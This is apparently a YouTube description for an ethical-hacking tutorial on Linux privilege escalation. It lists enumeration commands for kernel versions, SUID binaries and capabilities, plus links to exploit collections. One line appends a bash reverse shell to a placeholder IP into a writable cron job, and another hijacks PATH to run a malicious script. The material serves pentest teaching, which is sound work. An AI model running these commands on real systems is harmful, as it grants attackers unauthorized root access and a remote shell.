Get Started With Ethical Hacking: Linux Privilege Escalation (Part 1)

In this video, we dive deep into post-exploitation techniques to escalate privileges after landing a reverse shell. From kernel exploits to weak file permissions, I cover many key methods to gain root access. Learn how to manipulate SUID/SGID binaries, abuse Linux capabilities, exploit misconfigured cron jobs, and much more. Whether you're a beginner or an experienced ethical hacker, this guide will help you better understand the art of privilege escalation. Like and subscribe for more hacking tutorials! Check me out: https://linktr.ee/lukedexter Discord: https://discord.gg/EGDKsAaeZc LinkedIn Article: https://www.linkedin.com/pulse/15-default-linux-commands-manual-privilege-escalation-luke-dexter-p--zlgae/ Side note: YouTube won't allow angle brackets in the commands below, so I've replaced them with (ab) below. Commands Covered in This Video: uname -a uname -r Displays the current kernel version and other information. cat /proc/version Shows detailed information about the kernel, compiler, and build time. cat /etc/*release Displays the distribution name and version information. arch / getconf LONG_BIT Determines whether the system is 32-bit or 64-bit. searchsploit linux kernel version priv esc Searches for kernel privilege escalation exploits based on the version. find / -perm -u=s -type f 2(ab)/dev/null Searches for all files with SUID permissions, which can allow privilege escalation. find / -perm 6000 2(ab)/dev/null | grep '/bin/' Searches for files with either SUID or SGID permissions in the /bin/ directory. find / -perm -o+w -perm -o+x -type f 2(ab)/dev/null Locates files that are world-writable and world-executable, which can be a security risk. sudo -l Lists the allowed sudo commands for the current user, revealing potential privilege escalation paths. getcap -r / 2(ab)/dev/null | grep -E 'cap_setuid|cap_setgid|cap_dac_read_search|cap_dac_override|cap_sys_admin|cap_sys_module|cap_net_admin|cap_net_raw' Finds binaries with dangerous capabilities, which can be exploited for privilege escalation. echo "bash -i (ab)& /dev/tcp/your_IP/port 0 (ab)&1" (double ab) /etc/cron.d/vulnerable_cron Exploits a writable cron job by appending a reverse shell command. export PATH=/tmp:$PATH Modifies the $PATH variable to prioritize a malicious script before system binaries, tricking the system into executing it. Important Resources: Dirtycow Exploit: https://github.com/FireFart/dirtycow/blob/master/README.md Pre-Compiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits GTFOBins: https://gtfobins.github.io/ Join me in this deep dive to master privilege escalation techniques after gaining a foothold through a reverse shell. Don't forget to like and subscribe for more hacking content! #privilegeescalation #ethicalhacking #cybersecurity #reverseshell #pentesting